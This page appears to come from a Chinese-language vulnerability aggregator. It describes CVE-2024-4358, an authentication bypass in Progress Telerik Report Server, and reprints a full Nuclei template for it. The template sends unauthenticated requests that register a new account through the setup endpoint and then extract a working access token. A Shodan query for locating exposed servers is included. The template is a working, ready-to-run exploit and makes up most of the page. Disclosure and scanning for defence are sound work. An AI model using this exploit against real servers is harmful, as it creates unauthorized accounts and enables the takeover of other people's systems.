CVE-2024-4358: Progress Telerik Report Server - Authentication Bypass

日期: 2025-08-01 | 影响软件: Progress Telerik Report Server | POC: 已公开

漏洞描述

In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.

PoC代码[已公开]

id: CVE-2024-4358

info:
  name: Progress Telerik Report Server - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
  reference:
    - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
    - https://github.com/sinsinology/CVE-2024-4358
    - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
  classification:
    epss-score: 0.94374
    epss-percentile: 0.99963
    cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"Log in | Telerik Report Server"
    product: telerik_report_server
    vendor: progress
  tags: cve,cve2024,telerik,progress,auth-bypass,instrusive,kev,vkev
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /Startup/Register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}

      - |
        POST /Token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        grant_type=password&username={{user}}&password={{pass}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains_all(body_2, "access_token", "userName", "token_type")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        name: token
        part: body_2
        group: 1
        regex:
          - '"access_token":"([A-Z0-9a-z_-]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"Username: "+ user'
          - '"Password: "+ pass'
# digest: 4a0a00473045022050e135382c0bce2940d3c4e140a26d992eee7c18ad81f0e3bd1009da605c8060022100a178dcffa2c5e378155a3ab9443247707cd6b38dd5e6a45efa4a01bd990a4c6e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-4358.yaml

相关漏洞推荐